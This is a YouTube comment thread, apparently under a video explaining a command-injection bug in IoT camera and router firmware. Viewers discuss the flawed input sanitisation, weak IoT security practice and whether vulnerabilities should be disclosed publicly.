Ugh, I'm not a programmer, just been around IT long enough to be familiar with some concepts. Over the years I've written myself stupid heinous shell scripts thousands of lines long, which I know competent programmers would cringe at. But as amateurish as my scripting is, I always deliberately included lots of sanity checks for any arguments / input. And for other actions. Yes because I don't want my script deleting a wrong file but even where that's not a possibility, I did it simply for the practice & the habit because I know that is a CORE COMPETENCY of programming which I may want to explore one day. This sort of shit is frustrating even for us who aren't programmers. Thanks for the explanation of it.
@rtothec1234
@rtothec1234 2 ай бұрын
If you have built in cameras on your laptop do yourself a favor and buy yourself a six pack of webcam slide covers. $5 solution for a major problem. You just glue them to your screen or notch and can block your cam for the 99% of the time you are not using it.
@AlecMaly
@AlecMaly 2 ай бұрын
Thanks for showing the vulnerable code, need more of this type of content.
@JarheadCrayonEater
@JarheadCrayonEater 2 ай бұрын
The lack of security in IoT and "home automation" is a carryover from SCADA. That world has been focused on getting things working so much that they seemed to forget the vulnerabilities. I used constantly shake my head at the lack of security in PLC's, and other equipment, used in critical infrastructure and various other kinds of industrial automation. It's a mess, or at least used to be serval years ago.
@reaperinsaltbrine5211
@reaperinsaltbrine5211 2 ай бұрын
To be fair: the SCADA world started way before globally connected networks were a reality and the sunk cost of all those systems make upgrading very costly. Also there are issues with QA and legal certfifications and the like.. Also: industrial control systems should be separated (if only for safety reasons) from other networks, with very narrow and well defined doors to the outside world. And frankly if operational safety and data/communications security are in conflict, I usually would pick safety.
@JarheadCrayonEater
@JarheadCrayonEater 2 ай бұрын
@@reaperinsaltbrine5211, even with the separation, security was kicked down the timeline in the devices and PLC's. Until Stuxnet, there wasn't as big of a push for security, especially on the implementation side. At that time, manufacturers had considered and adopted it, but it wasn't used as it should have been. My comment was to focus on the implementation side, mostly, since that's what was carried over into home automation and IoT. Complacency in those industries was not a good example, yet was followed in the big IoT movement when it reached the market.
@reaperinsaltbrine5211
@reaperinsaltbrine5211 2 ай бұрын
@@JarheadCrayonEater You have valid points. Although I think the "IoT" crappiness is more the result of extremeely low profit margins than anything else. Also people's preferring convenience over anything else. About complacency: may have a role in it in many places. The devices presented in the video are products of the typical Valley rent-seeking startup mentality. What frightens the crap out of me that this thinking is no creeping into medical devices, too, see NeuraLink: I don't want to have to do anything with those. Btw I do NOT have cameras, lights, fridge, anything that is allowed to communicate outside my network without expilcit permission. Hell, I deliberately stuck with good old mechanical lightswitches and a dumb fridge :D These things will fade out like any other fad, the question is after how many damage?
@JarheadCrayonEater
@JarheadCrayonEater 2 ай бұрын
@@reaperinsaltbrine5211 , you have great points as well. It's not just one thing, as is usually the case. I'll just never forget when I started hearing the term "home automation" being used daily. I was a control system engineer on the pump stations in NOLA, among other industries, and just had to laugh at some of my stuff I saw coming out. Thinking "oh, boy, a lot of people are going to get rich, and a lot of others are about to find out the risks".
@reaperinsaltbrine5211
@reaperinsaltbrine5211 2 ай бұрын
@@JarheadCrayonEater oh, boy, a lot of people are going to get rich, and a lot of others are about to find out the risks". Yeah...seems it is not only my experience. I sometimes surprised the whole thing didn't collapse on us yet :o) In the last ~20 years I mostly do infrastucture ops and the kludge-on-kludge patchwork I work with everyday LOL. Not to mention the kludges I put in there just to keep it rolling :/ New shiny things always get money....maintaining the guts of the system is an uphill battle :)
@palme7414
@palme7414 2 ай бұрын
single handedly explained whole route people teach themself over decades, good job. btw why didn't you talk about the "unpatchable" nonsense in article title ?
@Vixikats
@Vixikats 2 ай бұрын
*Shows Router guts* "Every router in this family was vulnerable to a zero-day-" Me, looking 3 feet to my right seeing the exact router he just held up... Hmm.
@GetFitEatRight
@GetFitEatRight 2 ай бұрын
Install Fresh Tomato and move on with your life.
@BrokenSoul79x
@BrokenSoul79x 20 күн бұрын
Good way of "spreading awareness" and making sure _everybody_ know what to exploit and where... I'm _sure_ that does SO much good. 😑
@LiveseyMD
@LiveseyMD 2 ай бұрын
The worst thing is that this has already happened in the past. Humans never learn...
@natescode
@natescode 2 ай бұрын
Yup. Ever 5 years or so some company leaves passwords in plain text or allows SQL injection
@RealILOVEPIE
@RealILOVEPIE 2 ай бұрын
Netgear Nighthawk R7000v1 would be my guess for the router. Good thing I replaced the firmware on mine on day 1 with an alternative.
@aftbit
@aftbit 2 ай бұрын
It looks like they tried to sanitize quotes (the single character 0x22 they remove) but didn't realize that double quotes still allow string interpolation? What I don't get is why don't they pass the atoi'd result into the sprintf? They only compare that value to zero so they can issue an extra disable command. They could have done the zero comparison without converting to an integer, and since they already took atoi, they could have avoided the main security bug by using the integer in the string interpolation. There are two bugs in six lines of code. :/
@jamess1787
@jamess1787 2 ай бұрын
Thanks Triple L, youre the best
@DaremKurosaki
@DaremKurosaki 2 ай бұрын
I really hope it isn't, but that router looked like a netgear nighthawk.
@TeejMcSteez
@TeejMcSteez 2 ай бұрын
It looks like I was a chump who bought one back in the day too 😭
@YaySyu
@YaySyu 2 ай бұрын
​@@TeejMcSteezDude I connected my old nighthawk 6 months ago and in my router logs was a message from the shadow server foundation warning me that they detected a vulnerable router with their scanners. I found the message because my computer caught ransomware and I was investigating logs. Look them up, im serious. it was terrifying
@anoobis117
@anoobis117 2 ай бұрын
Thanks, Triple L, you're the best.
@sinistar3198
@sinistar3198 2 ай бұрын
4:00 I am going to vomit.
@min3craftpolska514
@min3craftpolska514 Ай бұрын
I'm taking a wild guess, it's probably netgear
@ZackWhitbord
@ZackWhitbord 2 ай бұрын
Sexually frustrating indeed
@ericytff7388
@ericytff7388 2 ай бұрын
Its 5am im on 4 hours of sleep and on my way to the airport, Thanks for zooming in LLL
@privacyvalued4134
@privacyvalued4134 2 ай бұрын
Even more fun is that you can place an ad with an ad network that executes this code remotely when people run their web browsers on the same network as their IoT devices. I think it's crazy that "Triple-L" runs without any web browser plugins to secure his own network from drive-by malware.
@lachlanwilger5044
@lachlanwilger5044 2 ай бұрын
Thanks for doing a deep dive into the actual part of the firmware itself that caused the vulnerability!
@MrJake-bb8bs
@MrJake-bb8bs 2 ай бұрын
But they've tried to sanitize the input and remove any double quotes (because the parameter is enquoted in ") The thing is bash/sh still parses it. They could've got away with this if they used single quotes as these are not parsed by the shell. Or just don't run pipe so simple things into a shell
@patsonical
@patsonical 2 ай бұрын
> They could've got away with this if they used single quotes as these are not parsed by the shell. Then the attacker can just inject a single quote to close the string and follow up with whatever command they please anyway
@MrJake-bb8bs
@MrJake-bb8bs 2 ай бұрын
@@patsonical They did this absolute minimum of removing quotes
@XRatedPoetry
@XRatedPoetry 2 ай бұрын
Ghidra properly decoding the entire file is probably the craziest thing in this video
@offtheball87
@offtheball87 2 ай бұрын
This smells like code someone wrote at 2am as a part of a proof of concept that just stuck around into production, and no one's ever gone back, because that part of the code works and isn't driving new features. Which is part of why the feature focus of software development these days irks me. Our jobs are framed features that solve user stories, or enablers to features that solve user stories, but so rarely on upkeep. This code needed to be torn out and rewritten long ago, but customers aren't asking for that.
@1783W
@1783W 2 ай бұрын
@@offtheball87 customers definitely want safety. It seems more like a leadership problem.
@offtheball87
@offtheball87 2 ай бұрын
@1783W they do, but it's an invisible benefit. If your focus is delivering value every sprint, you can easily misinterpret that to be delivering visible value every sprint. It's a leadership problem, but I think it's broader than the leadership of any given organisation.
@Bramble20322
@Bramble20322 2 ай бұрын
@@1783W You didnt even know this flaw existed until this video, why would fixing this bring any perceptible value to you? Customers dont care about this stuff, really. There should be a dedicated agency to regulate this kind of issue.
@ai-aniverse
@ai-aniverse 2 ай бұрын
I think this definitely falls into gross negligence. The problem is: *Who wrote it *What certifications they had *What certifications / standards are even applicable? *What standards are even being presumed by the customer?
@k1ngjulien_
@k1ngjulien_ 2 ай бұрын
OMG they are litteraly just writing a string to a driver file!! WE HAVE A WRITE SYSCALL WHY ARE YOU SPAWNING A SHELLLLL!?!?!?!?!?! EVEN WITHOUT SANITIZATION THAT WOULD HAVE EASIER, FASTER AND SAFER
@supercellex4D
@supercellex4D 2 ай бұрын
This is why I hate Unix
@k1ngjulien_
@k1ngjulien_ 2 ай бұрын
@@supercellex4D lol what? windows has the same things lol
@flyinginthedark6188
@flyinginthedark6188 2 ай бұрын
Instead of snprintf + system, they could have done fopen + fprintf + fclose, but that's one line more to type, probably too lazy to do it
@not-pyroman
@not-pyroman 2 ай бұрын
@@supercellex4D blame the devs for their bad practice? Nah Blame the OS? Of course, because it's *definitely* the fault of the OS
@supercellex4D
@supercellex4D 2 ай бұрын
@@not-pyroman Only Unix insists on magic files over documented predictable APIs
@SourceCodeDeleted
@SourceCodeDeleted 2 ай бұрын
Yeah another one of these. I have seen tons of them. And it's weird that they never really get fixed or resolved. Even when a newer version of the same router comes out. It's like they start from scratch each time.
@zelllers
@zelllers 2 ай бұрын
INTERNET OF SHIT
@user-nl2ho9gk3y
@user-nl2ho9gk3y 2 ай бұрын
apple IOS ? 🤣
@ninetydirectory3798
@ninetydirectory3798 2 ай бұрын
@@user-nl2ho9gk3y "Apple iOS"
@Mallchad
@Mallchad 2 ай бұрын
Smart device -> Dumb Device
@jonwatte4293
@jonwatte4293 2 ай бұрын
Downloadable firmware isn't bad -- open auditing is step one of a strong security engineering culture. If your security relies on obscurity, the bad guys will still find it but the good guys will have a harder time diagnosing it!
@Gunstick
@Gunstick 2 ай бұрын
If they would have written their cgi code in bash, then they would not need to call system and the code is then secure. Yes. Most secure code for web applications is... the shell! Fight me!
@__christopher__
@__christopher__ 2 ай бұрын
Well, the ultimate step in the exploit was exploiting bash (actually sh, which depending on the system may or may not be bash).
@Gunstick
@Gunstick 2 ай бұрын
@@__christopher__ what is counterintuitive but true: if the cgi is written in bash, you cannot exploit it, because instead of calling system() you just directly execute the thing. And if you directly execute, there is no exploitation possible.
@raddastronaut
@raddastronaut 2 ай бұрын
This is such a good channel. Great content and breakdowns.
@jerrody5400
@jerrody5400 2 ай бұрын
Researchers be like: - Found unpatchable 0-day vulnerability in cameras? Let's post it into public!
@AndrewTSq
@AndrewTSq 2 ай бұрын
This is good I think. Cause the hackers who already found the exploit use it.. so if you do not say anything, that means these people can record you in your home ... if they tell everyone about it, those people can turn off the camera.
@kentacy69
@kentacy69 2 ай бұрын
Do you really have enough trust in any company to think that they'd mention about massive vulnerability or do you prefer if everyone was living in ignorance?
@Bramble20322
@Bramble20322 2 ай бұрын
@@kentacy69 Well, knowing that this wont be fixed and that there's probably something similtar in the gear we're all using right now, i'd be tempted to choose ignorance just so i can be a little less anxious about this stuff.
@bvcdi
@bvcdi 2 ай бұрын
As a low level software developer this channel is exactly what this area needs. This sub domain is filled with people that release in productions products with parts of generic demo software. They think if they know how to use Arduino or other hobby tools like that they are qualified to develop highly integrated devices with complex systems. I know there is a pressure from the management to develop fast products, but I think we should have to courage to say wait a little, let me write the code, and stop copy code that we have no idea what contains. Anyway.....I may be considered and old dinosaur, but I like to have every part of my code write by me and my guys.....so that if any thing happens we can understand why and from where it is happening. Yes this may take long, but surely helps during the life time of the project and also adds to the security of the product. Yeah use opensource code, but review it first and try to identify any weakness it may contain, don't copy-paste just so that management is happy. Any way....nice video...liked it!
@JoeJoeTater
@JoeJoeTater 2 ай бұрын
Thanks, Triple-L. You're the best!
@daviddunmore8415
@daviddunmore8415 2 ай бұрын
Always validate input to a function, I've spent ours in the wee small hours fixing programs because there was no validation. The problem was usually nulls in a numeric field in a file coming from outside the business.
@AkshansYoutubeAccount
@AkshansYoutubeAccount 2 ай бұрын
today i got asked again to turn on my cam and when absolut darkness was present and ppl got confused, i explained that i taped over my cam. thank you for letting me know my reevaluation was correct.
@jrsmeets
@jrsmeets 2 ай бұрын
LLL you’re great. The code you showed was clearly legible on mobile.
@biffjones2601
@biffjones2601 22 күн бұрын
Pressure to complete projects too quickly leads to this kind of negligence.
@uuu12343
@uuu12343 2 ай бұрын
Man, I still remember first learning about IoT in around 2015 and my first thought was "Wait, that sounds dangerous" Good to know that even though I was technically new, it wasnt just me being a newbie and didnt know anything at the time
@hesar1975
@hesar1975 2 ай бұрын
its ALWAYS the same way, ages ago we developed some protocols like smtp, pop, http and similar, guys writing the code NEVER thought about bad actors attacking those, that is why now we are fighting hard to have safer versions of such protocols, in parallel, it happened to e.g. machinery/cars communications protocols, not a single engineer developing CAN bus was expecting CAN bus exposed via wi-fi, and obviously for IoT it is even more difficult as very often it is coded by not very skilled people, never ever having any security experience, and their managers having such neither (obviously it also increases costs when cost is crucial to sell such crap), greetings from Poland, I love your vids sir
@_wazner
@_wazner 2 ай бұрын
Funny how they thought that removing `"` (the 0x22 removal right before execution) is enough sanitization. I won't say that they do not sanitize, they didn't sanitize properly; which is a mark of someone who does know how the shell works.
@mikeh5493
@mikeh5493 2 ай бұрын
First time watching. You got some mad skills. Thank you!
@scaredyfish
@scaredyfish 2 ай бұрын
The function is called cgi_safe_snprintf, which I would naively assume is doing some sort of sanitization.
@technikschaf1574
@technikschaf1574 2 ай бұрын
Companies not having the binaries to download would just be security by obscurity. Great idea....
@ErazerPT
@ErazerPT 2 ай бұрын
IoT (and most embeded if we're to be honest) is "Ship fast" not "Ship good". The reason i write lots of stuff like that for my MCU's is that it's for personal use only, but if i ever was to ship anything, or heck, even put it on a public repo, I'd have to go and clean a lot of jank stuff.
@jsalsman
@jsalsman 2 ай бұрын
Negligence is a failure to exercise reasonable care, while gross negligence is a reckless disregard for safety. It's just simple negligence, and you can bet it's disclaimed as such in the terms of sale echoing the UCC terms. If it ever got to court, the defense would have no shortage of experts willing to testify the bug isn't unreasonable care, and I can think of several possibilities under which I would agree. For example, whoever wrote the code may not have known that it would ever be exposed to the public internet.
@emanuellandeholm5657
@emanuellandeholm5657 2 ай бұрын
Internet of Shit. We warned about these devices more than a decade ago. Now the chickens have come back to roost and my surprise is 0%.
@edwardallenthree
@edwardallenthree 2 ай бұрын
These injection attacks always remind me of Johnny tables at XKCD. Always validate your inputs!
@AQDuck
@AQDuck 2 ай бұрын
Bobby Tables*
Nature of Code with Daniel Shiffman
30:46
Scott Hanselman
Рет қаралды 2,3 М.
I Can't BELIEVE They Let Me in Here!
23:37
Linus Tech Tips
Рет қаралды 1,5 МЛН
А я думаю что за звук такой знакомый? 😂😂😂
00:15
Денис Кукояка
Рет қаралды 1,5 МЛН
Walking on LEGO Be Like... #shorts #mingweirocks
00:41
mingweirocks
Рет қаралды 7 МЛН
When u fight over the armrest
00:41
Adam W
Рет қаралды 29 МЛН
Hoodie gets wicked makeover! 😲
00:47
Justin Flom
Рет қаралды 130 МЛН
malicious javascript injected into 100,000 websites
12:28
Low Level
Рет қаралды 214 М.
there’s no way they did this..
12:50
Low Level
Рет қаралды 218 М.
the new PS4 jailbreak is sort of hilarious
12:21
Low Level
Рет қаралды 834 М.
Sqlite Is Getting So Good
28:52
ThePrimeTime
Рет қаралды 203 М.
if you view this image, YOU GET HACKED.
8:40
Low Level
Рет қаралды 389 М.
researchers find an unfixable bug in EVERY ARM cpu
9:48
Low Level
Рет қаралды 553 М.
А я думаю что за звук такой знакомый? 😂😂😂
00:15
Денис Кукояка
Рет қаралды 1,5 МЛН